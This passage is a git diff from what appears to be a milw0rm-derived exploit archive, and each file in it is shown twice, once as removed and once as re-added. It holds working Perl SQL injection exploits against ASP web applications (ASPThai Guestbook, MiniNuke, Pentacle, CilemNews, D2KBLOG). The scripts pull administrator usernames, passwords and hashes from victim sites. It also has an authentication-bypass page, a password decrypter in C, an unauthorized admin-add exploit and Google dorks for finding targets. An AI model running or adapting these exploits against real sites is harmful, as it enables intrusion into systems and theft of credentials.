default querry, so manually change the scrypt;-)...\n";exit(); } + } +print "Exploit failed\n"; +print "--------------------------\n"; + +# milw0rm.com [2006-01-14] diff --git a/platforms/asp/webapps/1472.pl b/platforms/asp/webapps/1472.pl index 3c3901f68..d19ff6a67 100755 --- a/platforms/asp/webapps/1472.pl +++ b/platforms/asp/webapps/1472.pl 
@@ -1,93 +1,93 @@ -#!/usr/bin/perl -# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5 -#(And possible higher could not find a site to test it on) -# This exploit shows the username of the administrator and the password In plain text -# Bug Found by muderskillz Coded by Zodiac -# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot. -# http://exploitercode.com/ http://www.g00ns.net -#irc.g00ns.net #g00ns email = zodiac@g00ns.net -#(c) 2006 - -use LWP::UserAgent; -use HTTP::Cookies; - -$Server = $ARGV[0]; - -if($Server =~m/http/g) -{ -$Server=~ 'http://$Server'; -print -} -else { - print $error; -} - -if(!$Server) {usage();exit() ;} - -head(); - -print "\r\nGrabbing Username And Password\r\n\n"; - -#Login's and stores a cookie to view admin panel later - - - $xpl = LWP::UserAgent->new() or die; - $cookie_jar = HTTP::Cookies->new(); - - $xpl->agent('g00ns'); - $xpl->cookie_jar($cookie_jar); - - $res = $xpl->post( - $Server.'check_user.asp', - Content => [ - - 'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', - 'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', - 'Submit' => '-= Login =-', - ], - ); - -# Create a request -my $req = HTTP::Request->new(GET => - -$Server.'change_admin_username.asp' - -); - -$req->header('Referer', $Server.'admin_menu.asp'); - -my $res = $xpl->request($req); - -$info= $res->content; - -if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) -{ - die "Error Connecting...\r\n"; -} - -#Check the outcome of the response - -$info=~m/(value=\")(\n+|\w+|\W+)/g; -$User = $2; -$info=~m/(value=\")(\n+|\w+|\W+)/g; -$Pass= $2; - -print "UserName:$User\r\nPassword:$Pass\r\n"; - -sub head() - { - print "\n=======================================================================\r\n"; - print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n"; - print "=======================================================================\r\n"; - } -sub usage() - { - 
head(); - print " Usage: Thaisql.pl \r\n\n"; - print " - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n"; - print "=======================================================================\r\n"; - print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n"; - print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; - print "=======================================================================\r\n"; - -# milw0rm.com [2006-02-06] +#!/usr/bin/perl +# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5 +#(And possible higher could not find a site to test it on) +# This exploit shows the username of the administrator and the password In plain text +# Bug Found by muderskillz Coded by Zodiac +# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot. +# http://exploitercode.com/ http://www.g00ns.net +#irc.g00ns.net #g00ns email = zodiac@g00ns.net +#(c) 2006 + +use LWP::UserAgent; +use HTTP::Cookies; + +$Server = $ARGV[0]; + +if($Server =~m/http/g) +{ +$Server=~ 'http://$Server'; +print +} +else { + print $error; +} + +if(!$Server) {usage();exit() ;} + +head(); + +print "\r\nGrabbing Username And Password\r\n\n"; + +#Login's and stores a cookie to view admin panel later + + + $xpl = LWP::UserAgent->new() or die; + $cookie_jar = HTTP::Cookies->new(); + + $xpl->agent('g00ns'); + $xpl->cookie_jar($cookie_jar); + + $res = $xpl->post( + $Server.'check_user.asp', + Content => [ + + 'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', + 'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73', + 'Submit' => '-= Login =-', + ], + ); + +# Create a request +my $req = HTTP::Request->new(GET => + +$Server.'change_admin_username.asp' + +); + +$req->header('Referer', $Server.'admin_menu.asp'); + +my $res = $xpl->request($req); + +$info= $res->content; + +if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/) +{ + die "Error Connecting...\r\n"; +} + +#Check the outcome of the response + 
+$info=~m/(value=\")(\n+|\w+|\W+)/g; +$User = $2; +$info=~m/(value=\")(\n+|\w+|\W+)/g; +$Pass= $2; + +print "UserName:$User\r\nPassword:$Pass\r\n"; + +sub head() + { + print "\n=======================================================================\r\n"; + print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n"; + print "=======================================================================\r\n"; + } +sub usage() + { + head(); + print " Usage: Thaisql.pl \r\n\n"; + print " - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n"; + print "=======================================================================\r\n"; + print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n"; + print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n"; + print "=======================================================================\r\n"; + +# milw0rm.com [2006-02-06] diff --git a/platforms/asp/webapps/1514.pl b/platforms/asp/webapps/1514.pl index 8eb4b4dd9..7316c1e80 100755 --- a/platforms/asp/webapps/1514.pl +++ b/platforms/asp/webapps/1514.pl 
@@ -1,50 +1,50 @@
-#!/usr/bin/perl
-#Method found & Exploit scripted by nukedx
-#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
-#Orginal advisory: http://www.nukedx.com/?viewdoc=9
-#Usage: mini.pl
-use IO::Socket;
-if(@ARGV != 3){
-print "
-+**********************************************************************+
-+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
-+ Usage: mini.pl +
-+ Example: mini.pl sux.com / 1 +
-+ Method found & Exploit scripted by nukedx +
-+**********************************************************************+
-";
-exit();
-}
-#Local variables
-$server = $ARGV[0];
-$server =~ s/(http:\/\/)//eg;
-$port = "80";
-$mndir = $ARGV[1];
-$victimid = $ARGV[2];
-$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
-#Writing data to socket
-print "+**********************************************************************+\n";
-print "+ Trying to connect: $server\n";
-$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
-print $mns "GET $sreq\n";
-print $mns "Host: $server\n";
-print $mns "Accept: */*\n";
-print $mns "Connection: close\n\n";
-print "+ Connected!...\n";
- while($answer = <$mns>) {
- if ($answer =~ /([\d,a-f]{32})/) {
- print "+ USERID: $victimid\n";
- print "+ MD5 HASH: $1\n";
- print "+**********************************************************************+\n";
- exit(); }
- if ($answer =~ /number of columns/) {
- print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
- print "+ So please edit query by manually adding null data..\n";
- exit(); }
- }
-print "+ Exploit failed\n";
-print "+**********************************************************************+\n";
-
-# nukedx.com [2006-02-19]
-
-# milw0rm.com [2006-02-19]
+#!/usr/bin/perl
+#Method found & Exploit scripted by nukedx
+#Contacts > ICQ: 10072 
MSN/Main: nukedx@nukedx.com web: www.nukedx.com
+#Orginal advisory: http://www.nukedx.com/?viewdoc=9
+#Usage: mini.pl
+use IO::Socket;
+if(@ARGV != 3){
+print "
++**********************************************************************+
++Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
++ Usage: mini.pl +
++ Example: mini.pl sux.com / 1 +
++ Method found & Exploit scripted by nukedx +
++**********************************************************************+
+";
+exit();
+}
+#Local variables
+$server = $ARGV[0];
+$server =~ s/(http:\/\/)//eg;
+$port = "80";
+$mndir = $ARGV[1];
+$victimid = $ARGV[2];
+$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
+#Writing data to socket
+print "+**********************************************************************+\n";
+print "+ Trying to connect: $server\n";
+$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
+print $mns "GET $sreq\n";
+print $mns "Host: $server\n";
+print $mns "Accept: */*\n";
+print $mns "Connection: close\n\n";
+print "+ Connected!...\n";
+ while($answer = <$mns>) {
+ if ($answer =~ /([\d,a-f]{32})/) {
+ print "+ USERID: $victimid\n";
+ print "+ MD5 HASH: $1\n";
+ print "+**********************************************************************+\n";
+ exit(); }
+ if ($answer =~ /number of columns/) {
+ print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
+ print "+ So please edit query by manually adding null data..\n";
+ exit(); }
+ }
+print "+ Exploit failed\n";
+print "+**********************************************************************+\n";
+
+# nukedx.com [2006-02-19]
+
+# milw0rm.com [2006-02-19]
diff --git a/platforms/asp/webapps/1528.pl b/platforms/asp/webapps/1528.pl
index 88b0dcbff..32f2dc87b 100755
--- a/platforms/asp/webapps/1528.pl
+++ b/platforms/asp/webapps/1528.pl
@@ -1,70 +1,70 @@
-#!/usr/bin/perl
-#Method found & Exploit scripted by nukedx
-#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
-#Usage: penta.pl
-#Original Advisory: http://www.nukedx.com/?viewdoc=14
-use IO::Socket;
-if(@ARGV < 3){
-print "
-+***********************************************************************+
-+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
-+ Usage: penta.pl +
-+ Example: penta.pl sux.com / 1 +
-+ Method found & Exploit scripted by nukedx +
-+***********************************************************************+
-";
-exit();
-}
-#Local variables
-$pentaserver = $ARGV[0];
-$pentaserver =~ s/(http:\/\/)//eg;
-$pentahost = "http://".$pentaserver;
-$port = "80";
-$pentadir = $ARGV[1];
-$pentaid = $ARGV[2];
-$pentatar = "newsdetailsview.asp?newsid=";
-$pentafinal = "login.asp";
-$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
-$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
-#Writing data to socket
-print "+**********************************************************************+\n";
-print "+ Trying to connect: $pentaserver\n";
-$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
-print $penta "GET $pentareq\n";
-print $penta "Host: $pentaserver\n";
-print $penta "Accept: */*\n";
-print $penta "Connection: close\n\n";
-print "+ Connected!...\n";
-while($answer = <$penta>) {
-if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
-print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
-print "+ ---------------- +\n";
-print "+ USERNAME: $1\n";
-}
-if ($answer =~ /(.*?) /) {
-print "+ PASSWORD: $1\n";
-print "+ ---------------- +\n";
-print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. 
\n";
-print "+**********************************************************************+\n";
-exit();
-}
-if ($answer =~ /Internal Server Error/) {
-print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
-print "+ So please edit query by manually adding or removing null datas..\n";
-print "+**********************************************************************+\n";
-exit();
-}
-if ($answer =~ /number of columns/) {
-print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
-print "+ So please edit query by manually adding or removing null datas..\n";
-print "+**********************************************************************+\n";
-exit();
-}
-}
-print "+ Try another userid maybe this one not the admin.\n";
-print "+ Exploit failed :(\n";
-print "+**********************************************************************+\n";
-
-# nukedx.com [2006-02-25]
-
-# milw0rm.com [2006-02-25]
+#!/usr/bin/perl
+#Method found & Exploit scripted by nukedx
+#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
+#Usage: penta.pl
+#Original Advisory: http://www.nukedx.com/?viewdoc=14
+use IO::Socket;
+if(@ARGV < 3){
+print "
++***********************************************************************+
++Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. 
XPL+
++ Usage: penta.pl +
++ Example: penta.pl sux.com / 1 +
++ Method found & Exploit scripted by nukedx +
++***********************************************************************+
+";
+exit();
+}
+#Local variables
+$pentaserver = $ARGV[0];
+$pentaserver =~ s/(http:\/\/)//eg;
+$pentahost = "http://".$pentaserver;
+$port = "80";
+$pentadir = $ARGV[1];
+$pentaid = $ARGV[2];
+$pentatar = "newsdetailsview.asp?newsid=";
+$pentafinal = "login.asp";
+$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
+$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
+#Writing data to socket
+print "+**********************************************************************+\n";
+print "+ Trying to connect: $pentaserver\n";
+$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
+print $penta "GET $pentareq\n";
+print $penta "Host: $pentaserver\n";
+print $penta "Accept: */*\n";
+print $penta "Connection: close\n\n";
+print "+ Connected!...\n";
+while($answer = <$penta>) {
+if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
+print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
+print "+ ---------------- +\n";
+print "+ USERNAME: $1\n";
+}
+if ($answer =~ /(.*?) /) {
+print "+ PASSWORD: $1\n";
+print "+ ---------------- +\n";
+print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. 
\n";
+print "+**********************************************************************+\n";
+exit();
+}
+if ($answer =~ /Internal Server Error/) {
+print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
+print "+ So please edit query by manually adding or removing null datas..\n";
+print "+**********************************************************************+\n";
+exit();
+}
+if ($answer =~ /number of columns/) {
+print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
+print "+ So please edit query by manually adding or removing null datas..\n";
+print "+**********************************************************************+\n";
+exit();
+}
+}
+print "+ Try another userid maybe this one not the admin.\n";
+print "+ Exploit failed :(\n";
+print "+**********************************************************************+\n";
+
+# nukedx.com [2006-02-25]
+
+# milw0rm.com [2006-02-25]
diff --git a/platforms/asp/webapps/1529.htm b/platforms/asp/webapps/1529.htm
index b84aa3f62..b9cac6b23 100755
--- a/platforms/asp/webapps/1529.htm
+++ b/platforms/asp/webapps/1529.htm
@@ -1,36 +1,36 @@
- -Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability - - - -Fill in the blank !:D
-Just enter host/path/ not http://host/path/!
-If Pentacle installed on / just enter host
-Example: host.com
-Example2: host.com/ptdir/
-
-Target -> - - - -
- - -Save this code as .htm and then execute. - -# nukedx.com [2006-02-25] - -# milw0rm.com [2006-02-25] + +Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability + + + +Fill in the blank !:D
+Just enter host/path/ not http://host/path/!
+If Pentacle installed on / just enter host
+Example: host.com
+Example2: host.com/ptdir/
+
+Target -> + + + +
+ + +Save this code as .htm and then execute. + +# nukedx.com [2006-02-25] + +# milw0rm.com [2006-02-25] diff --git a/platforms/asp/webapps/1550.txt b/platforms/asp/webapps/1550.txt index d1d1b63d4..a97723d37 100755 --- a/platforms/asp/webapps/1550.txt +++ b/platforms/asp/webapps/1550.txt 
@@ -1,66 +1,66 @@ -Original advisory: http://www.nukedx.com/?viewdoc=18 -Advisory by: nukedx -Full PoC -Explotation: -GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] -EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores -EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores -with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name -[PageID]: must be working page id you can get some from frontpage. -<--Decrypter code--> -<--Note: This decrypter just decrypts default data -If webmaster changed te_chave value in funcoes.asp -this decrypter wont decrypt data so you need to -make your own decrypter ---> -<--C Source--> -/********************************************* -* TotalECommerce PWD Decrypter * -* Coded by |SaMaN| for nukedx * -* http://www.k9world.org * -* IRC.K9World.Org * -*Advisory: http://www.nukedx.com/?viewdoc=18 * -**********************************************/ -#include -#include -#include -#include - -int main() -{ - char buf[255]; - char buf2[255]; - char buf3[255]; - char *texto; - char *vcrypt; - int i,x,z,t = 0; - char saman; - texto = buf; - vcrypt = buf2; - printf("%s", "|=------------------------------------=|\n"); - printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n"); - printf("%s", "|=------------------------------------=|\n\n"); - printf("%s", "Enter crypted password: "); - scanf("%200s", buf); - if (!texto) - vcrypt = ""; - - for (i = 0; i < strlen(texto); i++) - { - if ((vcrypt == "") || 
(i > strlen(texto))) - x = 1; - else - x = x + 1; - t = buf[i]; - z = 255 - t; - saman = toascii(z); - snprintf(buf3, 250, "%c", saman); - strncat(buf2, buf3, 250); - } - printf("Result: %s\n", buf2); - return; -} -<--End of code--> -<--Thanks |SaMaN| for decrypter--> - -// milw0rm.com [2006-03-04] +Original advisory: http://www.nukedx.com/?viewdoc=18 +Advisory by: nukedx +Full PoC +Explotation: +GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL] +EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores +EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores +with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name +[PageID]: must be working page id you can get some from frontpage. 
+<--Decrypter code--> +<--Note: This decrypter just decrypts default data +If webmaster changed te_chave value in funcoes.asp +this decrypter wont decrypt data so you need to +make your own decrypter +--> +<--C Source--> +/********************************************* +* TotalECommerce PWD Decrypter * +* Coded by |SaMaN| for nukedx * +* http://www.k9world.org * +* IRC.K9World.Org * +*Advisory: http://www.nukedx.com/?viewdoc=18 * +**********************************************/ +#include +#include +#include +#include + +int main() +{ + char buf[255]; + char buf2[255]; + char buf3[255]; + char *texto; + char *vcrypt; + int i,x,z,t = 0; + char saman; + texto = buf; + vcrypt = buf2; + printf("%s", "|=------------------------------------=|\n"); + printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n"); + printf("%s", "|=------------------------------------=|\n\n"); + printf("%s", "Enter crypted password: "); + scanf("%200s", buf); + if (!texto) + vcrypt = ""; + + for (i = 0; i < strlen(texto); i++) + { + if ((vcrypt == "") || (i > strlen(texto))) + x = 1; + else + x = x + 1; + t = buf[i]; + z = 255 - t; + saman = toascii(z); + snprintf(buf3, 250, "%c", saman); + strncat(buf2, buf3, 250); + } + printf("Result: %s\n", buf2); + return; +} +<--End of code--> +<--Thanks |SaMaN| for decrypter--> + +// milw0rm.com [2006-03-04] diff --git a/platforms/asp/webapps/1562.pl b/platforms/asp/webapps/1562.pl index 2ec781a13..0ad48e207 100755 --- a/platforms/asp/webapps/1562.pl +++ b/platforms/asp/webapps/1562.pl 
@@ -1,68 +1,68 @@
-#!/usr/bin/perl
-#Method found & Exploit scripted by nukedx
-#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
-#Usage: cilem.pl
-#Original Advisory: http://www.nukedx.com/?viewdoc=10
-#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
-use IO::Socket;
-if(@ARGV < 2){
-print "
-+***********************************************************************+
-+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
-+ Usage: cilem.pl +
-+ Example: cilem.pl sux.com / +
-+ googledork [ inurl:yazdir.asp?haber_id= ] +
-+ Method found & Exploit scripted by nukedx +
-+***********************************************************************+
-";
-exit();
-}
-#Local variables
-$cilemserver = $ARGV[0];
-$cilemserver =~ s/(http:\/\/)//eg;
-$cilemhost = "http://".$cilemserver;
-$port = "80";
-$cilemdir = $ARGV[1];
-$cilemtar = "yazdir.asp?haber_id=";
-$cilemfinal = "admin/giris.asp";
-$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
-$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
-#Writing data to socket
-print "+**********************************************************************+\n";
-print "+ Trying to connect: $cilemserver\n";
-$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
-print $cilem "GET $cilemreq\n";
-print $cilem "Host: $cilemserver\n";
-print $cilem "Accept: */*\n";
-print $cilem "Connection: close\n\n";
-print "+ Connected!...\n";
-while($answer = <$cilem>) {
-if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
-print "+ Exploit succeed! Getting admin's information.\n";
-print "+ ---------------- +\n";
-print "+ USERNAME: $1\n";
-}
-if ($answer =~ /(.*?)<\/font><\/td>/) {
-print "+ PASSWORD: $1\n";
-print "+ ---------------- +\n";
-print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. 
\n";
-print "+**********************************************************************+\n";
-exit();
-}
-if ($answer =~ /Internal Server Error/) {
-print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
-print "+ So please edit query by manually adding or removing null datas..\n";
-print "+**********************************************************************+\n";
-exit();
-}
-if ($answer =~ /number of columns/) {
-print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
-print "+ So please edit query by manually adding or removing null datas..\n";
-print "+**********************************************************************+\n";
-exit();
-}
-}
-print "+ Exploit failed :(\n";
-print "+**********************************************************************+\n";
-
-# milw0rm.com [2006-03-07]
+#!/usr/bin/perl
+#Method found & Exploit scripted by nukedx
+#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
+#Usage: cilem.pl
+#Original Advisory: http://www.nukedx.com/?viewdoc=10
+#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages... 
+use IO::Socket;
+if(@ARGV < 2){
+print "
++***********************************************************************+
++Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
++ Usage: cilem.pl +
++ Example: cilem.pl sux.com / +
++ googledork [ inurl:yazdir.asp?haber_id= ] +
++ Method found & Exploit scripted by nukedx +
++***********************************************************************+
+";
+exit();
+}
+#Local variables
+$cilemserver = $ARGV[0];
+$cilemserver =~ s/(http:\/\/)//eg;
+$cilemhost = "http://".$cilemserver;
+$port = "80";
+$cilemdir = $ARGV[1];
+$cilemtar = "yazdir.asp?haber_id=";
+$cilemfinal = "admin/giris.asp";
+$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
+$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
+#Writing data to socket
+print "+**********************************************************************+\n";
+print "+ Trying to connect: $cilemserver\n";
+$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
+print $cilem "GET $cilemreq\n";
+print $cilem "Host: $cilemserver\n";
+print $cilem "Accept: */*\n";
+print $cilem "Connection: close\n\n";
+print "+ Connected!...\n";
+while($answer = <$cilem>) {
+if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
+print "+ Exploit succeed! Getting admin's information.\n";
+print "+ ---------------- +\n";
+print "+ USERNAME: $1\n";
+}
+if ($answer =~ /(.*?)<\/font><\/td>/) {
+print "+ PASSWORD: $1\n";
+print "+ ---------------- +\n";
+print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. 
\n";
+print "+**********************************************************************+\n";
+exit();
+}
+if ($answer =~ /Internal Server Error/) {
+print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
+print "+ So please edit query by manually adding or removing null datas..\n";
+print "+**********************************************************************+\n";
+exit();
+}
+if ($answer =~ /number of columns/) {
+print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
+print "+ So please edit query by manually adding or removing null datas..\n";
+print "+**********************************************************************+\n";
+exit();
+}
+}
+print "+ Exploit failed :(\n";
+print "+**********************************************************************+\n";
+
+# milw0rm.com [2006-03-07]
diff --git a/platforms/asp/webapps/1569.pl b/platforms/asp/webapps/1569.pl
index 55e9b7270..6216d6af5 100755
--- a/platforms/asp/webapps/1569.pl
+++ b/platforms/asp/webapps/1569.pl
@@ -1,55 +1,55 @@ - #!/usr/bin/perl -w - # D2KBLOG SQL injection - # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ] - # Exploited by : devil_box [ devil_box [at} kapda.ir ] - # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net) - -require LWP::UserAgent; -require HTTP::Request; -print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n"; -print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n"; -print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n"; -print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n"; -print "\r\n=-=-=-==================================================================-=-=-=\r\n"; - - if (@ARGV != 2) - { - print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; - print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n"; - exit (); - } - - -my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,); - -my $Path = $ARGV[0]; - -my $Page = $ARGV[1]; - -my $URL = "http://".$Path.$Page; - -print "|***| Connecting to ".$URL." 
...\r\n"; - -$r = HTTP::Request->new(GET => $URL."?action=edit"); - -$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=" ); - -$res = $ua->request($r); - -print "|***| Connected !\r\n"; - -if ($res->is_success) { - - print "|***| Extracting Username and Password ...\r\n\r\n"; - - my $results = $res->content; - - while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; } - - print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n"; - - } else { - die "\r\n|***| ".$res->status_line; - } - -# milw0rm.com [2006-03-09] + #!/usr/bin/perl -w + # D2KBLOG SQL injection + # Discovered by : Farhad Koosha [ farhadkey [at} kapda.ir ] + # Exploited by : devil_box [ devil_box [at} kapda.ir ] + # member of : Kapda.ir - Security Science Researchers Institute of Iran (persianhacker.net) + +require LWP::UserAgent; +require HTTP::Request; +print "\r\n\r\n=-=-=-==================================================================-=-=-=\r\n\r\n"; +print " KAPDA - Security Science Researchers Institute of Iran\r\n\r\n"; +print " PoC for D2KBLOG SQL injection bug - Administrator Password Extractor\r\n\r\n"; +print " Original Source : http://kapda.ir/advisory-287.html (persianhacker.net)\r\n\r\n"; +print "\r\n=-=-=-==================================================================-=-=-=\r\n"; + + if (@ARGV != 2) + { + print " Usage: kapda_D2KBLOG_xpl.pl [Target Domain] [Vulnerable Page]\n\r\n"; + print " ex: kapda_D2KBLOG_xpl.pl www.target.com /blog/profile.asp\n\r\n"; + exit (); + } + + +my $ua = LWP::UserAgent->new(env_proxy => 1,keep_alive => 1,timeout => 30,); + +my $Path = $ARGV[0]; + +my $Page = $ARGV[1]; + +my $URL = "http://".$Path.$Page; + +print "|***| Connecting to ".$URL." 
...\r\n"; + +$r = HTTP::Request->new(GET => $URL."?action=edit"); + +$r->header( "Cookie" =>$Path."=memPassword=&memStatus=&memName=" ); + +$res = $ua->request($r); + +print "|***| Connected !\r\n"; + +if ($res->is_success) { + + print "|***| Extracting Username and Password ...\r\n\r\n"; + + my $results = $res->content; + + while($results=~/\"\*\*stxt\*\*(.*?)\*\*etxt\*\*\"/ig){ print "-=-> $1 \r\n"; } + + print "\r\n Exploit by Devil_Box\r\n Discovery by Farhad koosha\r\n\r\n"; + + } else { + die "\r\n|***| ".$res->status_line; + } + +# milw0rm.com [2006-03-09] diff --git a/platforms/asp/webapps/1571.htm b/platforms/asp/webapps/1571.htm index 8340cc3ff..9fe635510 100755 --- a/platforms/asp/webapps/1571.htm +++ b/platforms/asp/webapps/1571.htm @@ -1,57 +1,57 @@ - -Jiros Banner Experience Pro Unauthorized Admin Add Exploit - - - - - -
-
-Welcome to Jiros Banner Experience Pro Unauthorized Admin Add Exploit -This exploit has been coded by nukedx -You can found original advisory on http://www.nukedx.com/?viewdoc=19 -Dork for this exploit: inurl:JBSPro -Your target must be like that: www.victim.com/Path/ -The sites you found with given dork has like: www.victim.com/JBSPro/files or www.victim.com/JBSPro.asp -If the site has /JBSPro/files in link your target must be www.victim.com/JBSPro/ -For second example your target must be www.victim.com/ -You can login with your admin account via www.victim.com/JBSPath/files/login.asp -Have phun -
-Target -> - - - - - - -
-
-
-
- - - -Save this code as .htm and then execute. - -# nukedx.com [2006-03-07] - -# milw0rm.com [2006-03-09] + +Jiros Banner Experience Pro Unauthorized Admin Add Exploit + + + + + +
+
